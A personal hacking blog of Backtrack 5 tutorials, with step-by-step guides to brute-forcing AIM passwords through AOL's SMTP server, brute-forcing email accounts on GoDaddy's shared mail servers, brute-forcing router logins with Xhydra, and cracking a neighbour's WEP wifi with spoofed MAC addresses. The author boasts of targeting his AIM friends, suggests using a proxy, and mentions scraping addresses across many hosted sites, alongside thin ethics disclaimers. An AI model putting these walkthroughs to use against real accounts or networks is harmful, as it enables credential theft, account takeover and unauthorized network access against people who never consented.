Saturday, April 27, 2013

Using Xhydra to hack AIM (Aol Instant Messenger) screen names.

I really Love Backtrack 5 and all the tools it comes with, Metasploit, Xhydra, Nmap, some of the most popular. But there's nothing i enjoy more than the feeling of success, the feeling you get when your hard work finally pays off, and the password goes through. I had a lot of fun doing this as a password pentester back in my younger days. i was surprised at just how easy it was to get peoples passwords using a brute forcer and the right server configuration. i was popular on AIM. i had over 160 friends, and what that meant is that i had over 160 active screen names to try and get the password to!
Here's how it's done.
Fire up a terminal, zenmap and Xhydra

ping smtp.aol.com your output should look like this:
In some circumstances the IP address will be different. i will supply you with the correct one; but hypothetically any IP address will work

step 1. ping smtp.aol.com (64.12.175.136)

step 2. port scan the IP address and verify port 587 (SMTP AUTH) is open

step 3. input data into Xhydra
-target tab-
single target: 64.12.175.136
port: 587
service: smtp


-password tab-
username: programmerdemon (or any screenname)
password: passwordlist (i have my own)
*others can be found in /root/pentest/passwords/wordlist/
*or/root/pentest/passwords/john/password.lst
*or Here 


 -tuning tab-
about 8 tasks should be fine
 -start-

it was my screenname so i didn't show the password. also, you may want to use a proxy. any questions don't hesitate to email.
Thanks! 
 

 

Friday, April 26, 2013

Installing Backtrack 5 R3 to hard drive and Dual boot with Windows.

Believe it or not - a few of my readers are having a hard time with this. it's ok. I was there, many times before. Fortunately, Backtrack 5 is relatively easy to install to your hard drive and make bootable. I remember before Backtrack there was a linux distribution called P.H.L.A.K. Acronym for "Professional Hackers Linux Assault Kit". anyway, it was nearly impossible during the first few releases to install to the hard disk. you had to manually partition the drive yourself, configure the boot loader yourself and then hope that you don't lose any data creating the swap and Ext partitions. Backtrack 5 does it all automatically. I have a few pictures (taken with a smartphone) to help guide the way for you.
I highly advise installing backtrack 5 to the hard drive. the CD loader takes waaay to long to get anything done and you really don't need to use a whole lot of hard drive space.

First thing you need is a computer running backtrack 5 on a live DVD
 Then all you have to do is click the Install Backtrack icon



 Starting here:
go through each step
Step 1, 2 and 3 are Language, Time zone and keyboard layout.
After that, it can be a bit tricky re-sizing and partitioning the drive


What you want to do here is click "Install them side by side, choosing between them each startup"
what this will do is keep your windows or other OS partitions but resize them, making available disc space to install backtrack 5 on. at the bottom of the screen there is a slider - on the right side slide the slider to desired size of your backtrack partition. i chose 40.1gb. That's plenty for me. unless you're going to be keeping a lot of files and saving music and images, you really shouldn't need more than 30gb's.

click forward, then continue. the setup will then install backtrack after partitioning the drive
Keep in mind, the new boot loader will have BT5 as first  option by default. just hit the down arrow to select your other os.
All questions are welcome to email

davidjgeraway@gmail.com 

Wordlist to start with for passwords

 Due to the recent popularity of this post and through multiple complaints that people don't wan't to spend the 30 seconds to copy/paste out of a page and make their own document, i have provided a download link to the .txt. I'm not too familiar with google docs, so please don't try any XSS with the provided link to the PW list.
BASIC PASSWORD FILE

Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in backtrack is to crack a good ole WIFI. It can lead to so many different options and really brings me back to my roots as to why i stumbled upon backtrack in the first place. I guess it's just thrilling, it gives me  sort of a high to be in places i shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun an exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but i do not do anything malicious to the machines i exploit. I have permission to do so. This is an Ethical Hackers website for information and security purposes only.
I'm Far from a pro-hacker. I'm Maybe intermediate at best. if anything looks out of the ordinary feel free to email me with any questions or tips. I don't claim to be the best; i'm still learning. However, what i have learned thus far i'm willing to share so here goes:

Today I'm going to demonstrate how insecure the WEP encryption is through wifi. In Today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a poineer in telecom. Well in my area Verizon offers high speed internet DSL and FIOS. Great service most of the time. The problem is their Westell DSL modems/WIFI routers come preset to use the WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.

Fire up a shell and run commands as following

1. airmon-ng

 wlan1 is my interface. these can be variable so yours may be different

next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.

1. airmon-ng stop wlan1     (Stops the wlan1 interface)
2. ifconfig wlan1 down        (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1      (restarts the interface with new mac)
Below is what it looked like for me.

In Some situations your Network adapter may not be supported. i will compile a list of supported network adapters in the future. or you can google it.
I have this one:


 


 
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command

1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)

after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1


This is what your output should look like:

 
Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running,  in a seperate terminal run this command

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

for me the command looks like this

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
.


Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1

 

Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.

Ok, it's been about a half hr and it's time to run the cracker. run this command.

1. aircrack-ng -b (bssid) (filename-01.cap)

if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
  And IF you did it will look like this:

 The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7




Happy Hacking!

questions email me: davidjgeraway@gmail.com


 






  w

Friday, September 14, 2012

Hacking email addresses using zenmap, xhydra and a wordlist.

I have setup a rogue email account on a web server that i own a lease to. What we are going to do is find the IP address to the server that sends the mail, scan for open ports to mail services (Pop3 & SMTP) input the data into Hydra and in return bruteforce for the password.
 I have done this on many occasions as a security tester and what i have found is that MOST people use the same password for everything. That's why it's important to keep your email password exclusive. What i have found in 90% of the time is that people have everything linked to their main email address. Online banking, website registration and Facebook to name a few. All you have to do after gaining access to an important email account is a little detective work along with some "forgot password" forms and then you pretty must own the E-Identity. I'm going to show you how to prevent this from happening to yourself and your clients. 
Please note these are real hacking methods that are going to be tested on real servers. One of the IP's i'm going to release correlates to a godaddy hosted server, and even though anyone can find this i want to say i do not condone black hat hacking, nor do i advise anyone to use these methods for malicious use. Lets Get Started

www.brotherspropertymanagement.com will be our target for example.

In backtrack 5, Fire up a Terminal, Zenmap and Hydra-GTK.

ping the desired web server:
 we see a secureserver hostname along with the IP. Typically in this instance i would run a zenmap scan on it.
However no mail server is returned. This is a practical example of where we can be de-railed because the mail server is different from the one we scanned. but with a little research we can easily find the mail server AND SETTINGS on google using the hostname.
 We have found the link for email setup. You will only need to do this if the web server is hosted by a product like godaddy. In some situations the web server will include all services to run the website and some back end things like FTP,HTTP,POP,SMTP & MYSQL.
click the link
 Those are the settings. Now we see we have 2 options. pop.secureserver.net and smtpout.secureserver.net. Please keep this in mind, These 2 servers HOST ALL MAIL on godaddy websites. This is dangerous because if you really wanted to you could scan a range of godaddy ip's, visit the websites, copy the email addresses, make a list to bruteforce. This is why i strongly advise a secure password.
Lets choose SMTP. It's not encrypted, doesn't kick us off after a few attempts of password breaking AND ITS FAST, SUPER FAST.
ping smtpout.secureserver.net a few times and you will see the ip is different. it really doesn't matter so open Xhydra and configure like this:
single target: smtpout.secureserver.net (this is the mail server)
port: 25 (this is default unencrypted SMTP port)
protocol: smtp (simple mail transfer protocol)
as always check off show attempts.


on the passwords tab for username you always want the full user with the @domain.com in the end our user is
rogueaccount@brotherspropertymanagement.com
select your password list. refer to my Last Post on how to find a wordlist in backtrack.
Or Click Here for Wordlist

Goto the start tab and click start.

Then we have success. I will be remove the rogue account so you little bastards don't try any funny business.


RECAP:
1. Find Target
2. Find SMTP Mail Server
3. Input data to Hydra
4. Crack Away  






code SMRRARMWCNXT  


Monday, September 10, 2012

Using XHydra to hack router password

Here we are. Firstly i must advise you to only use these methods to test your own security. I will be hacking my own email address / router password as example. 
here are your tools - all can be found in backtrack 5 and some earlier versions.

*Update 4/27/2013*
i have written a part two Using Xhydra to hack aol instant messenger passwords (AIM) 
Given the popularity of this post.


 

Start X-Hydra
 Also Start Zenmap 

 Everything should start by looking like this:
We will start by hacking a local network router password. This can be very useful to a hacker in the scenario where one has cracked a wifi password and gained local access to the network. After gaining access to the router possibilities are endless. all router security can be disabled and then we can perform MitM attacks (i will write an article on this later). if you're experienced enough in networking then you get the picture.
Typically a router's IP address will start with 192.168.x.x. (which it may be in your case) to check this type ipconfig in windows and ifconfig in linux. the routers IP will be the Default Gateway). 
Now i'm sure you have seen this before:


What we are going to do is tell Xhydra to connect to the routers http server with a protected page, input the username and bruteforce the password. Note this method can be used against any similar password protected page not using forms (will make another post on how to use against forms later).

so your input should be like this:
Check off show attempts as it makes it easier. single target SHOULD BE YOUR DEFUALT GATEWAY. perhaps 192.168.0.1. do not use this against websites or hardware you do not own or have permission to test. Important - port should be 80 or in some cases 8080. EVEN MORE IMPORTANT under PROTOCOL find http-get and click it. to find open ports on a device just scan the target IP with zenmap.
Back to hydra


in most cases the username will be admin. also in most cases the password will be either "password" "admin" or BLANK.
however, in my situation the default password is far different from admin or blank. so what i have done was selected a wordlist. you can find many wordlists using google. typically the bigger the better especially on a local network. backtrack comes with a few. can be found in: /root/pentest/passwords/wordlists
 i have compiled my own and named it password.lst.
Click Here for a basic wordlist 
so:
click username enter admin
click Password list and select your list
also check off "try login as password" and "try empty password"
then move to the Specific tab.
change http / https url to just a slash    /
this tells hydra what directory the protected page is on the server.

goto the start tab and click start. results will follow.


this quick tutorial is mainly for people beginning. i do not claim to be an expert in the field, however i am qualified to talk about these things. hydra is a powerful tool. it can be used for much more than just bruteforcing protected page passwords. there are a numerous amount of protocols, ftp, pop3, smtp and ssh being my favorite. next tutorial i will get a little more in depth on the scanning part and i will show you how to do this with virtually any email address.
questions please email. davidjgeraway@gmail.com
  

Wednesday, September 5, 2012

Introduction to hacking

Hello World. The purpose of this blog will be to give back to the community in which i have learned so much about. I choose to write about this topic for  three reasons:
a) i enjoy it 
b) it's something i feel i'm qualified to write about.
c) it can help me to learn more

So lets start with what it means to "Hack". For me, it is to gain access (authorized or not) using computer software & programming knowledge of another system ran by an operating system. Hacking can be done to many things for good and bad reasons. A "Hack" can also be a modification of firmware or hardware for whatever justified reason.

However, i get the suspicion that most who stumble upon this blog are looking for point and click references or a step by step "how-to" guide. ( I will be doing that, with screenshots!)
BELIEVE me, i was there. I was a script kiddie. In todays world hacking comes a lot easier - as there are many tools and resources for you to use. Backtrack, the linux distribution, being a whole operating system full of hacking tools. 
My first tutorial will be about using ping, nmap and Hydra GTK in a method called bruteforcing to test security on email passwords and local router access. See you soon!